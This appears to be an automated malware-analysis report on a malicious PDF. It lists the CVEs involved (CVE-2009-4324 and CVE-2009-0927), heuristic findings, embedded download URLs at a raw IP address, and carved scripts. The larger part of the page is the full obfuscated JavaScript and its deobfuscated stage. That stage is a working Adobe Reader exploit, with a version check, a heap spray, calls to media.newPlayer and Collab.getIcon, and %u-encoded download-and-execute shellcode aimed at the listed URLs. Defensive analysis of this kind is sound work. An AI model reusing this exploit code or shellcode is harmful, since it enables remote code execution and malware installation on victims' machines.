MALICIOUS
310
Risk Score
Malware Insights
MITRE ATT&CK
T1203 Exploitation for Client Execution
T1059.007 JavaScript
The PDF file contains embedded JavaScript that exploits multiple CVEs in Adobe Reader (CVE-2009-4324 and CVE-2009-0927). The deobfuscated JavaScript contains embedded URLs which are used to download a second-stage payload. This indicates a clear intent to exploit the user's system for further malicious activity.
Machine Learning
- Nyx PDF Classifier malicious score 1.0000
Heuristics 9
-
media.newPlayer — CVE-2009-4324 critical CVE exact CVE_2009_4324PDF JavaScript calls media.newPlayer — CVE-2009-4324 is a use-after-free in Adobe Reader's multimedia plugin triggered by media.newPlayer(). Actively exploited as a zero-day in December 2009. (identified after JavaScript deobfuscation)
-
Collab.getIcon — CVE-2009-0927 critical CVE exact CVE_2009_0927PDF JavaScript calls Collab.getIcon — CVE-2009-0927 is a stack buffer overflow in Adobe Reader triggered by Collab.getIcon() with a crafted argument. Allows arbitrary code execution. (identified after JavaScript deobfuscation)
-
Multi-CVE Adobe Reader JavaScript exploit kit critical PDF_ADOBE_READER_MULTI_CVE_JS_KITOne recovered JavaScript stage contains multiple version-gated Adobe Reader exploit branches. This is stronger evidence than independent API keywords: the PDF is selecting old Reader vulnerabilities by viewer version and running heap-sprayed Acrobat JavaScript exploit paths.
-
Generic recovered JavaScript exploit stage high PDF_GENERIC_STAGE_RECOVERYBounded static stage recovery exposed hidden JavaScript through generic transforms such as null-byte collapse, percent decoding, marker replacement, arithmetic character codes, fromCharCode, numeric arrays, numeric-array minus-key decoders, alphabet-index arrays, /Producer half-difference metadata arrays, hex literals, marker-stripped Base64 literals, custom 6-bit XOR table decoders, or repeated-marker hex carriers. This rule is emitted only when the recovered stage contains exploit-like Acrobat JavaScript or shellcode markers.
-
JavaScript action low 2 related findings PDF_JAVASCRIPTPDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
-
PDF exploit shellcode contains an embedded download URL high PDF_JS_SHELLCODE_DOWNLOAD_URLDecoded PDF exploit shellcode contains a hardcoded http(s) URL — stored as little-endian %uXXXX Unicode escapes, or hex-encoded in a document metadata field (/CreationDate, /Title) and referenced from the decoded script. Reader exploit shellcode embeds the second-stage fetch URL this way and pulls it down with a urlmon/URLDownloadToFile-style download-and-execute (commodity downloader behaviour rather than a specific Acrobat CVE).
-
Embedded JS stream low PDF_JSPDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://91.228.133.56/my090911/1723f1e8e0d96b7f8bce5aca1cff6805/d7.php?f=g Referenced by PDF JavaScript
- http://91.228.133.56/my090911/1723f1e8e0d96b7f8bce5aca1cff6805/d8.php?f=nReferenced by PDF JavaScript
Extracted artifacts 3
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
javascript_obj0076_000.js |
pdf-javascript-stream | PDF /JS object 76 at offset 0x38A | 13369 bytes |
SHA-256: 0fbf7ad6b4842286a88df84fc065db9fa5bb09421e9b59d39fce07e60f22618d |
|||
Preview scriptFirst 1,000 lines of the extracted script
a="h_va,Dg>r;coNV<+m|u=2I ]%1-Pt4fB{9s63&Sn()i7plbA0'8d[:y.Fx@Ce5}wE";
w='';
w+='sl';
w+='i';
w+="c"+a[60];
j='b343tb3g';
j=j[w];
z
=new Array
(2,3,8,22,1,25,11,19,49,24,18,50,36,35,35,24,18,56,59,64,29,24,18,50,61,56,59,24,18,43,61,64,29,24,18,64,33,36,29,24,18,36,36,61,56,24,18,35,29,59,48,24,18,29,48,50,31,24,18,50,31,36,48,24,18,48,59,29,48,24,18,43,48,50,31,24,18,61,35,25,59,24,18,43,35,50,31,24,18,36,36,48,50,24,18,35,35,5,31,24,18,61,64,50,31,24,18,48,36,36,59,24,18,36,36,43,29,24,18,50,25,20,59,24,18,25,61,64,64,24,18,56,56,25,48,24,18,31,50,56,56,24,18,29,48,50,31,24,18,59,36,36,48,24,18,36,33,29,35,24,18,43,61,48,35,24,18,50,43,56,31,24,18,20,29,36,29,24,18,64,29,50,61,24,18,61,25,43,61,24,18,64,31,64,33,24,18,61,25,29,59,24,18,50,31,61,35,24,18,36,59,43,61,24,18,43,29,50,31,24,18,43,50,36,61,24,18,56,61,48,36,24,18,50,31,61,35,24,18,20,48,43,35,24,18,56,61,48,36,24,18,59,33,36,36,24,18,29,25,29,33,24,18,47,5,56,59,24,18,59,61,48,36,24,18,5,31,36,36,24,18,31,64,48,56,24,18,36,50,25,48,24,18,43,29,56,20,24,18,59,25,48,50,24,18,48,5,59,31,24,18,5,47,48,36,24,18,64,31,29,48,24,18,36,31,56,25,24,18,43,61,25,56,24,18,61,64,64,35,24,18,61,64,50,31,24,18,48,36,20,29,24,18,35,35,5,5,24,18,48,59,50,31,24,18,50,5,29,31,24,18,64,59,29,35,24,18,61,29,56,56,24,18,48,59,20,29,24,18,5,50,50,31,24,18,5,5,48,36,24,18,48,29,50,31,24,18,48,36,50,31,24,18,47,31,59,61,24,18,61,33,61,64,24,18,64,31,59,36,24,18,47,5,61,36,24,18,35,50,50,31,24,18,50,48,20,48,24,18,48,59,43,5,24,18,43,29,36,36,24,18,33,35,48,36,24,18,56,36,64,31,24,18,35,50,50,31,24,18,50,31,48,50,24,18,35,47,56,43,24,18,61,33,48,61,24,18,33,50,64,50,24,18,56,56,56,56,24,18,64,20,56,56,24,18,64,50,56,33,24,18,48,48,48,48,24,18,48,48,48,48,24,18,61,48,61,50,24,18,29,48,35,47,24,18,56,56,35,50,24,18,48,48,48,48,24,18,61,48,48,48,24,18,59,48,50,36,24,18,61,48,25,33,24,18,50,31,61,61,24,18,50,31,64,59,24,18,25,48,61,64,24,18,59,36,50,36,24,18,56,56,48,61,24,18,35,50,64,36,24,18,35,64,35,56,24,18,48,48,48,48,24,18,43,61,35,50,24,18,35,59,43,20,24,18,61,29,35,5,24,18,25,35,56,56,24,18,59,29,50,36,24,18,50,31,48,50,24,18,64,50,64,50,24,18,56,56,35,25,24,18,56,56,56,56,24,18,48,20,64,31,24,18,43,20,64,31,24,18,64,59,50,25,24,18,48,25,48,29,24,18,48,48,48,48,24,18,61,59,50,5,24,18,48,59,20,29,24,18,48,29,59,43,24,18,43,20,20,29,24,18,35,43,35,61,24,18,59,43,43,36,24,18,20,29,29,29,24,18,43,35,48,29,24,18,36,36,43,20,24,18,59,43,36,20,24,18,20,29,29,29,24,18,20,48,48,50,24,18,43,36,20,5,24,18,61,36,20,48,24,18,56,50,35,50,24,18,48,48,48,48,24,18,56,56,48,48,24,18,48,59,61,35,24,18,64,50,50,31,24,18,59,33,36,36,24,18,59,43,61,25,24,18,25,5,29,29,24,18,43,43,48,48,24,18,35,20,43,48,24,18,59,43,43,29,24,18,25,5,29,29,24,18,20,64,48,61,24,18,35,59,35,29,24,18,59,35,35,59,24,18,25,5,29,29,24,18,48,48,48,33,24,18,50,47,61,33,24,18,48,29,59,25,24,18,50,50,36,48,24,18,25,5,29,29,24,18,29,25,48,29,24,18,35,47,61,25,24,18,35,47,48,48,24,18,61,36,48,48,24,18,35,47,61,43,24,18,56,56,48,48,24,18,25,29,61,35,24,18,59,48,50,61,24,18,25,35,43,61,24,18,48,48,35,47,24,18,56,56,61,36,24,18,48,29,61,35,24,18,48,48,35,47,24,18,64,31,50,36,24,18,61,36,48,59,24,18,61,35,56,56,24,18,50,36,48,29,24,18,48,59,59,36,24,18,48,20,64,31,24,18,25,36,64,31,24,18,50,48,29,43,24,18,48,48,36,56,24,18,56,47,43,61,24,18,50,48,29,43,24,18,48,48,36,56,24,18,59,29,43,61,24,18,48,48,35,47,24,18,56,64,35,47,24,18,61,35,56,56,24,18,64,50,48,50,24,18,56,64,33,59,24,18,56,56,56,56,24,18,29,64,50,64,24,18,64,59,48,64,24,18,56,64,33,50,24,18,48,64,50,47,24,18,35,56,50,33,24,18,31,5,48,25,24,18,59,47,36,36,24,18,61,31,50,47,24,18,59,35,25,31,24,18,43,33,29,35,24,18,25,47,36,35,24,18,43,48,20,56,24,18,43,29,35,50,24,18,43,48,43,29,24,18,20,56,36,47,24,18,36,33,20,56,24,18,20,64,36,25,24,18,36,20,36,20,24,18,20,64,36,50,24,18,36,36,36,25,24,18,20,64,36,36,24,18,36,35,36,61,24,18,35,5,20,56,24,18,36,48,43,33,24,18,36,48,36,33,24,18,36,25,36,33,24,18,20,56,36,25,24,18,36,43,36,25,24,18,36,36,36,20,24,18,36,25,35,35,24,18,36,50,35,61,24,18,36,48,35,61,24,18,36,33,35,29,24,18,35,20,36,35,24,18,35,35,36,43,24,18,35,20,36,50,24,18,35,61,35,36,24,18,35,25,36,61,24,18,35,25,35,36,24,18,35,36,36,25,24,18,35,35,35,35,24,18,36,50,36,35,24,18,36,61,36,48,24,18,35,29,20,56,24,18,20,64,36,43,24,18,35,50,43,48,24,18,36,56,43,48,24,18,36,5,35,35,24,18,48,48,35,43,24,18,48,48,48,48,49,9,2,3,8,22,1,20,11,19,49,24,18,50,36,35,35,24,18,56,59,64,29,24,18,50,61,56,59,24,18,43,61,64,29,24,18,64,33,36,29,24,18,36,36,61,56,24,18,35,29,59,48,24,18,29,48,50,31,24,18,50,31,36,48,24,18,48,59,29,48,24,18,43,48,50,31,24,18,61,35,25,59,24,18,43,35,50,31,24,18,36,36,48,50,24,18,35,35,5,31,24,18,61,64,50,31,24,18,48,36,36,59,24,18,36,36,43,29,24,18,50,25,20,59,24,18,25,61,64,64,24,18,56,56,25,48,24,18,31,50,56,56,24,18,29,48,50,31,24,18,59,36,36,48,24,18,36,33,29,35,24,18,43,61,48,35,24,18,50,43,56,31,24,18,20,29,36,29,24,18,64,29,50,61,24,18,61,25,43,61,24,18,64,31,64,33,24,18,61,25,29,59,24,18,50,31,61,35,24,18,36,59,43,61,24,18,43,29,50,31,24,18,43,50,36,61,24,18,56,61,48,36,24,18,50,31,61,35,24,18,20,48,43,35,24,18,56,61,48,36,24,18,59,33,36,36,24,18,29,25,29,33,24,18,47,5,56,59,24,18,59,61,48,36,24,18,5,31,36,36,24,18,31,64,48,56,24,18,36,50,25,48,24,18,43,29,56,20,24,18,59,25,48,50,24,18,48,5,59,31,24,18,5,47,48,36,24,18,64,31,29,48,24,18,36,31,56,25,24,18,43,61,25,56,24,18,61,64,64,35,24,18,61,64,50,31,24,18,48,36,20,29,24,18,35,35,5,5,24,18,48,59,50,31,24,18,50,5,29,31,24,18,64,59,29,35,24,18,61,29,56,56,24,18,48,59,20,29,24,18,5,50,50,31,24,18,5,5,48,36,24,18,48,29,50,31,24,18,48,36,50,31,24,18,47,31,59,61,24,18,61,33,61,64,24,18,64,31,59,36,24,18,47,5,61,36,24,18,35,50,50,31,24,18,50,48,20,48,24,18,48,59,43,5,24,18,43,29,36,36,24,18,33,35,48,36,24,18,56,36,64,31,24,18,35,50,50,31,24,18,50,31,48,50,24,18,35,47,56,43,24,18,61,33,48,61,24,18,33,50,64,50,24,18,56,56,56,56,24,18,64,20,56,56,24,18,64,50,56,33,24,18,48,48,48,48,24,18,48,48,48,48,24,18,61,48,61,50,24,18,29,48,35,47,24,18,56,56,35,50,24,18,48,48,48,48,24,18,61,48,48,48,24,18,59,48,50,36,24,18,61,48,25,33,24,18,50,31,61,61,24,18,50,31,64,59,24,18,25,48,61,64,24,18,59,36,50,36,24,18,56,56,48,61,24,18,35,50,64,36,24,18,35,64,35,56,24,18,48,48,48,48,24,18,43,61,35,50,24,18,35,59,43,20,24,18,61,29,35,5,24,18,25,35,56,56,24,18,59,29,50,36,24,18,50,31,48,50,24,18,64,50,64,50,24,18,56,56,35,25,24,18,56,56,56,56,24,18,48,20,64,31,24,18,43,20,64,31,24,18,64,59,50,25,24,18,48,25,48,29,24,18,48,48,48,48,24,18,61,59,50,5,24,18,48,59,20,29,24,18,48,29,59,43,24,18,43,20,20,29,24,18,35,43,35,61,24,18,59,43,43,36,24,18,20,29,29,29,24,18,43,35,48,29,24,18,36,36,43,20,24,18,59,43,36,20,24,18,20,29,29,29,24,18,20,48,48,50,24,18,43,36,20,5,24,18,61,36,20,48,24,18,56,50,35,50,24,18,48,48,48,48,24,18,56,56,48,48,24,18,48,59,61,35,24,18,64,50,50,31,24,18,59,33,36,36,24,18,59,43,61,25,24,18,25,5,29,29,24,18,43,43,48,48,24,18,35,20,43,48,24,18,59,43,43,29,24,18,25,5,29,29,24,18,20,64,48,61,24,18,35,59,35,29,24,18,59,35,35,59,24,18,25,5,29,29,24,18,48,48,48,33,24,18,50,47,61,33,24,18,48,29,59,25,24,18,50,50,36,48,24,18,25,5,29,29,24,18,29,25,48,29,24,18,35,47,61,25,24,18,35,47,48,48,24,18,61,36,48,48,24,18,35,47,61,43,24,18,56,56,48,48,24,18,25,29,61,35,24,18,59,48,50,61,24,18,25,35,43,61,24,18,48,48,35,47,24,18,56,56,61,36,24,18,48,29,61,35,24,18,48,48,35,47,24,18,64,31,50,36,24,18,61,36,48,59,24,18,61,35,56,56,24,18,50,36,48,29,24,18,48,59,59,36,24,18,48,20,64,31,24,18,25,36,64,31,24,18,50,48,29,43,24,18,48,48,36,56,24,18,56,47,43,61,24,18,50,48,29,43,24,18,48,48,36,56,24,18,59,29,43,61,24,18,48,48,35,47,24,18,56,64,35,47,24,18,61,35,56,56,24,18,64,50,48,50,24,18,56,64,33,59,24,18,56,56,56,56,24,18,29,64,50,64,24,18,64,59,48,64,24,18,56,64,33,50,24,18,48,64,50,47,24,18,35,56,50,33,24,18,31,5,48,25,24,18,59,47,36,36,24,18,61,31,50,47,24,18,59,35,25,31,24,18,43,33,29,35,24,18,25,47,36,35,24,18,43,48,20,56,24,18,43,29,35,50,24,18,43,48,43,29,24,18,20,56,36,47,24,18,36,33,20,56,24,18,20,64,36,25,24,18,36,20,36,20,24,18,20,64,36,50,24,18,36,36,36,25,24,18,20,64,36,36,24,18,36,35,36,61,24,18,35,5,20,56,24,18,36,48,43,33,24,18,36,48,36,33,24,18,36,25,36,33,24,18,20,56,36,25,24,18,36,43,36,25,24,18,36,36,36,20,24,18,36,25,35,35,24,18,36,50,35,61,24,18,36,48,35,61,24,18,36,33,35,29,24,18,35,20,36,35,24,18,35,35,36,43,24,18,35,20,36,50,24,18,35,61,35,36,24,18,35,25,36,61,24,18,35,25,35,36,24,18,35,36,36,25,24,18,35,35,35,35,24,18,36,50,36,35,24,18,36,61,36,48,24,18,35,29,20,56,24,18,20,64,36,50,24,18,35,50,43,48,24,18,36,56,43,48,24,18,36,5,35,35,24,18,48,48,35,64,24,18,48,48,48,48,49,9,30,18,39,10,28,42,11,39,22,1,36,11,40,41,32,2,3,8,22,1,29,11,19,3,44,44,55,2,42,60,63,60,8,13,60,8,34,42,11,39,55,28,11,38,28,8,42,39,6,40,41,9,1,29,11,19,1,29,11,55,8,60,44,45,3,10,60,40,49,55,49,4,49,49,41,9,63,0,42,45,60,40,1,29,11,55,45,60,39,6,28,0,14,29,41,32,1,29,11,15,19,49,48,49,9,62,1,29,11,19,44,3,8,34,60,21,39,28,40,1,29,11,4,25,48,41,9,8,60,28,18,8,39,22,1,29,11,9,62,30,18,39,10,28,42,11,39,22,1,61,11,40,41,32,30,18,39,10,28,42,11,39,22,1,35,11,40,41,32,2,3,8,22,1,43,11,19,49,44,58,25,25,25,25,25,25,25,25,25,25,25,25,25,25,25,25,25,25,25,25,25,25,25,25,22,53,22,54,54,54,54,25,25,25,49,9,18,28,42,45,55,44,8,42,39,28,51,40,1,43,11,4,39,60,63,22,5,3,28,60,40,41,41,9,62,2,3,8,22,1,50,11,19,25,20,48,48,48,9,1,33,11,19,39,60,63,22,47,8,8,3,54,40,41,9,2,3,8,22,1,25,11,48,19,49,24,18,33,48,33,48,24,18,33,48,33,48,49,9,2,3,8,22,1,25,11,25,19,1,20,11,9,1,25,11,48,19,18,39,60,34,10,3,44,60,40,1,25,11,48,41,9,1,25,11,25,19,18,39,60,34,10,3,44,60,40,1,25,11,25,41,9,63,0,42,45,60,40,1,25,11,48,55,45,60,39,6,28,0,14,19,48,57,50,48,48,48,41,32,1,25,11,48,15,19,1,25,11,48,9,62,1,25,11,48,19,1,25,11,48,55,34,18,46,34,28,8,40,48,4,48,57,50,48,48,48,26,1,25,11,25,55,45,60,39,6,28,0,41,9,22,30,11,8,40,1,25,11,20,19,48,9,1,25,11,20,14,1,50,11,9,1,25,11,20,15,15,41,32,1,33,11,52,1,25,11,20,23,19,1,25,11,48,15,1,25,11,25,9,62,42,30,40,1,50,11,41,32,1,35,11,40,41,9,1,35,11,40,41,9,28,8,54,32,28,0,42,34,55,16,60,51,42,3,55,39,60,63,27,45,3,54,60,8,40,39,18,45,45,41,9,62,10,3,28,10,0,40,60,41,32,62,1,35,11,40,41,9,62,62,30,18,39,10,28,42,11,39,22,1,25,11,36,40,41,32,2,3,8,22,1,25,11,29,19,18,39,60,34,10,3,44,60,40,1,25,11,41,9,1,25,11,61,19,18,39,60,34,10,3,44,60,40,49,24,18,33,48,33,48,24,18,33,48,33,48,24,18,33,48,33,48,24,18,33,48,33,48,24,18,33,48,33,48,24,18,33,48,33,48,24,18,33,48,33,48,24,18,33,48,33,48,24,18,33,48,33,48,24,18,33,48,33,48,24,18,33,48,33,48,24,18,33,48,33,48,24,18,33,48,33,48,24,18,33,48,33,48,24,18,33,48,33,48,24,18,33,48,33,48,24,18,33,48,33,48,24,18,33,48,33,48,24,18,33,48,33,48,24,18,33,48,33,48,24,18,33,48,33,48,24,18,33,48,33,48,24,18,33,48,33,48,24,18,33,48,33,48,24,18,33,48,33,48,24,18,33,48,33,48,24,18,33,48,33,48,24,18,33,48,33,48,24,18,33,48,33,48,24,18,33,48,33,48,24,18,33,48,33,48,24,18,33,48,33,48,24,18,33,48,33,48,24,18,33,48,33,48,24,18,33,48,33,48,24,18,33,48,33,48,24,18,33,48,33,48,24,18,33,48,33,48,24,18,33,48,33,48,24,18,33,48,33,48,24,18,33,48,33,48,24,18,33,48,33,48,24,18,33,48,33,48,24,18,33,48,33,48,24,18,33,48,33,48,24,18,33,48,33,48,24,18,33,48,33,48,24,18,33,48,33,48,24,18,33,48,33,48,24,18,33,48,33,48,24,18,33,48,33,48,24,18,33,48,33,48,24,18,33,48,33,48,24,18,33,48,33,48,24,18,33,48,33,48,24,18,33,48,33,48,24,18,33,48,33,48,24,18,33,48,33,48,24,18,33,48,33,48,24,18,33,48,33,48,24,18,33,48,33,48,24,18,33,48,33,48,24,18,33,48,33,48,24,18,33,48,33,48,24,18,33,48,33,48,24,18,33,48,33,48,24,18,33,48,33,48,24,18,33,48,33,48,24,18,33,48,33,48,24,18,33,48,33,48,24,18,33,48,33,48,24,18,33,48,33,48,24,18,33,48,33,48,24,18,33,48,33,48,24,18,33,48,33,48,24,18,33,48,33,48,24,18,33,48,33,48,24,18,33,48,33,48,24,18,33,48,33,48,24,18,33,48,33,48,49,41,15,1,25,11,29,9,1,25,11,35,19,18,39,60,34,10,3,44,60,40,49,24,18,33,48,33,48,24,18,33,48,33,48,49,41,9,1,25,11,43,19,25,48,9,1,25,11,50,19,1,25,11,43,15,1,25,11,61,55,45,60,39,6,28,0,9,63,0,42,45,60,40,1,25,11,35,55,45,60,39,6,28,0,14,1,25,11,50,41,1,25,11,35,15,19,1,25,11,35,9,1,25,11,33,19,1,25,11,35,55,34,18,46,34,28,8,42,39,6,40,48,4,1,25,11,50,41,9,1,20,11,20,19,1,25,11,35,55,34,18,46,34,28,8,42,39,6,40,48,4,1,25,11,35,55,45,60,39,6,28,0,26,1,25,11,50,41,9,63,0,42,45,60,40,1,20,11,20,55,45,60,39,6,28,0,15,1,25,11,50,14,48,57,29,48,48,48,48,41,1,20,11,20,19,1,20,11,20,15,1,20,11,20,15,1,25,11,33,9,1,20,11,48,19,39,60,63,22,47,8,8,3,54,40,41,9,30,11,8,40,1,20,11,25,19,48,9,1,20,11,25,14,25,50,48,9,1,20,11,25,15,15,41,1,20,11,48,52,1,20,11,25,23,19,1,20,11,20,15,1,25,11,61,9,2,3,8,22,1,20,11,36,19,29,48,25,20,9,2,3,8,22,1,20,11,29,19,47,8,8,3,54,40,1,20,11,36,41,9,30,11,8,40,1,20,11,25,19,48,9,1,20,11,25,14,1,20,11,36,9,1,20,11,25,15,15,41,32,1,20,11,29,52,1,20,11,25,23,19,18,39,60,34,10,3,44,60,40,49,24,48,3,24,48,3,24,48,3,24,48,3,49,41,9,62,59,11,45,45,3,46,55,6,60,28,21,10,11,39,40,1,20,11,29,15,49,1,12,55,46,18,39,51,45,60,49,41,9,62,2,3,8,22,1,29,11,19,1,36,11,40,41,9,42,30,40,40,40,1,29,11,7,50,33,61,48,41,37,37,40,1,29,11,14,33,48,61,48,41,41,17,17,40,40,1,29,11,7,19,50,48,48,48,41,37,37,40,1,29,11,14,19,50,25,48,20,41,41,41,32,1,25,11,36,40,41,9,62,60,45,34,60,22,42,30,40,40,1,29,11,7,19,33,25,48,48,41,17,17,40,1,29,11,14,19,33,20,48,48,41,17,17,40,1,29,11,7,19,50,25,48,36,41,17,17,40,1,29,11,14,19,50,25,48,43,41,41,32,1,61,11,40,41,9,62);
s='';
b
=
'al';
b2
=a[60]
+
a[2]+b;for
(i=0;i<z.length;i++)
{s+=a[z[i]]}
e=(j());
e=e[b2];
e(s);
|
|||
generic_stage_recovery_000.js |
deobfuscated-js | generic stage recovery alphabet-index-array from JavaScript object 76 at offset 0x38A | 4469 bytes |
SHA-256: b0e7c2cf76262d9db804dbb0f3e74700e7a536e2ab7500e4858d0adff9e547c6 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 6 eval/decoder/string-building token(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
var _1o='%u8366%uFCE4%u85FC%u75E4%uE934%u335F%u64C0%u408B%u8B30%u0C40%u708B%u561C%u768B%u3308%u66DB%u5E8B%u033C%u3374%u812C%u15EE%uFF10%uB8FF%u408B%uC330%u3946%u7506%u87FB%u2434%uE485%u5175%uEBE9%u514C%u8B56%u3C75%u748B%u7835%uF503%u8B56%u2076%uF503%uC933%u4149%uADFC%uC503%uDB33%uBE0F%u3810%u74F2%uC108%u0DCB%uDA03%uEB40%u3BF1%u751F%u5EE6%u5E8B%u0324%u66DD%u0C8B%u8D4B%uEC46%u54FF%u0C24%uD88B%uDD03%u048B%u038B%uABC5%u595E%uEBC3%uAD53%u688B%u8020%u0C7D%u7433%u9603%uF3EB%u688B%u8B08%u6AF7%u5905%u98E8%uFFFF%uE2FF%uE8F9%u0000%u0000%u5058%u406A%uFF68%u0000%u5000%uC083%u5019%u8B55%u8BEC%u105E%uC383%uFF05%u68E3%u6E6F%u0000%u7568%u6C72%u546D%u16FF%uC483%u8B08%uE8E8%uFF61%uFFFF%u02EB%u72EB%uEC81%u0104%u0000%u5C8D%u0C24%u04C7%u7224%u6765%uC773%u2444%u7604%u3372%uC732%u2444%u2008%u732D%u5320%uF868%u0000%uFF00%u0C56%uE88B%uC933%uC751%u1D44%u7700%u6270%uC774%u1D44%u2E05%u6C64%uC66C%u1D44%u0009%u8A59%u04C1%u8830%u1D44%u4104%u6A51%u6A00%u5300%u6A57%uFF00%u1456%uC085%u1675%u006A%uFF53%u0456%u006A%uEB83%u530C%u56FF%u8304%u0CC3%u02EB%u13EB%u8047%u003F%uFA75%u8047%u003F%uC475%u006A%uFE6A%u56FF%uE808%uFE9C%uFFFF%u4E8E%uEC0E%uFE98%u0E8A%u6F89%uBD01%uCA33%u5B8A%uC61B%u7946%u1A36%u702F%u7468%u7074%u2F3A%u392F%u2E31%u3232%u2E38%u3331%u2E33%u3635%u6D2F%u3079%u3039%u3139%u2F31%u3731%u3332%u3166%u3865%u3065%u3964%u6236%u6637%u6238%u6563%u6135%u6163%u6331%u6666%u3836%u3530%u642F%u2E37%u6870%u3F70%u3D66%u0067%u0000';var _2o='%u8366%uFCE4%u85FC%u75E4%uE934%u335F%u64C0%u408B%u8B30%u0C40%u708B%u561C%u768B%u3308%u66DB%u5E8B%u033C%u3374%u812C%u15EE%uFF10%uB8FF%u408B%uC330%u3946%u7506%u87FB%u2434%uE485%u5175%uEBE9%u514C%u8B56%u3C75%u748B%u7835%uF503%u8B56%u2076%uF503%uC933%u4149%uADFC%uC503%uDB33%uBE0F%u3810%u74F2%uC108%u0DCB%uDA03%uEB40%u3BF1%u751F%u5EE6%u5E8B%u0324%u66DD%u0C8B%u8D4B%uEC46%u54FF%u0C24%uD88B%uDD03%u048B%u038B%uABC5%u595E%uEBC3%uAD53%u688B%u8020%u0C7D%u7433%u9603%uF3EB%u688B%u8B08%u6AF7%u5905%u98E8%uFFFF%uE2FF%uE8F9%u0000%u0000%u5058%u406A%uFF68%u0000%u5000%uC083%u5019%u8B55%u8BEC%u105E%uC383%uFF05%u68E3%u6E6F%u0000%u7568%u6C72%u546D%u16FF%uC483%u8B08%uE8E8%uFF61%uFFFF%u02EB%u72EB%uEC81%u0104%u0000%u5C8D%u0C24%u04C7%u7224%u6765%uC773%u2444%u7604%u3372%uC732%u2444%u2008%u732D%u5320%uF868%u0000%uFF00%u0C56%uE88B%uC933%uC751%u1D44%u7700%u6270%uC774%u1D44%u2E05%u6C64%uC66C%u1D44%u0009%u8A59%u04C1%u8830%u1D44%u4104%u6A51%u6A00%u5300%u6A57%uFF00%u1456%uC085%u1675%u006A%uFF53%u0456%u006A%uEB83%u530C%u56FF%u8304%u0CC3%u02EB%u13EB%u8047%u003F%uFA75%u8047%u003F%uC475%u006A%uFE6A%u56FF%uE808%uFE9C%uFFFF%u4E8E%uEC0E%uFE98%u0E8A%u6F89%uBD01%uCA33%u5B8A%uC61B%u7946%u1A36%u702F%u7468%u7074%u2F3A%u392F%u2E31%u3232%u2E38%u3331%u2E33%u3635%u6D2F%u3079%u3039%u3139%u2F31%u3731%u3332%u3166%u3865%u3065%u3964%u6236%u6637%u6238%u6563%u6135%u6163%u6331%u6666%u3836%u3530%u642F%u2E38%u6870%u3F70%u3D66%u006E%u0000';function _3o(){var _4o=app.viewerVersion.toString();_4o=_4o.replace('.','');while(_4o.length<4){_4o+='0';}_4o=parseInt(_4o,10);return _4o;}function _5o(){function _6o(){var _7o='p@111111111111111111111111 : yyyy111';util.printd(_7o,new Date());}var _8o=12000;_9o=new Array();var _1o0='%u9090%u9090';var _1o1=_2o;_1o0=unescape(_1o0);_1o1=unescape(_1o1);while(_1o0.length<=0x8000){_1o0+=_1o0;}_1o0=_1o0.substr(0,0x8000-_1o1.length); for(_1o2=0;_1o2<_8o;_1o2++){_9o[_1o2]=_1o0+_1o1;}if(_8o){_6o();_6o();try{this.media.newPlayer(null);}catch(e){}_6o();}}function _1o3(){var _1o4=unescape(_1o);_1o5=unescape('%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090')+_1o4;_1o6=unescape('%u9090%u9090');_1o7=10;_1o8=_1o7+_1o5.length;while(_1o6.length<_1o8)_1o6+=_1o6;_1o9=_1o6.substring(0,_1o8);_2o2=_1o6.substring(0,_1o6.length-_1o8);while(_2o2.length+_1o8<0x40000)_2o2=_2o2+_2o2+_1o9;_2o0=new Array();for(_2o1=0;_2o1<180;_2o1++)_2o0[_2o1]=_2o2+_1o5;var _2o3=4012;var _2o4=Array(_2o3);for(_2o1=0;_2o1<_2o3;_2o1++){_2o4[_2o1]=unescape('%0a%0a%0a%0a');}Collab.getIcon(_2o4+'_N.bundle');}var _4o=_3o();if(((_4o>8950)&&(_4o<9050))||((_4o>=8000)&&(_4o<=8102))){_1o3();}else if((_4o>=9100)||(_4o<=9200)||(_4o>=8103)||(_4o<=8107)){_5o();}
|
|||
generic_stage_recovery_001.js |
deobfuscated-js | generic stage recovery percent-decode from JavaScript object 76 at offset 0x38A | 4461 bytes |
SHA-256: 32224d3bfc2dc7365885f6397f515c4908cab0e041589cb1d176584a333a3a4a |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 6 eval/decoder/string-building token(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
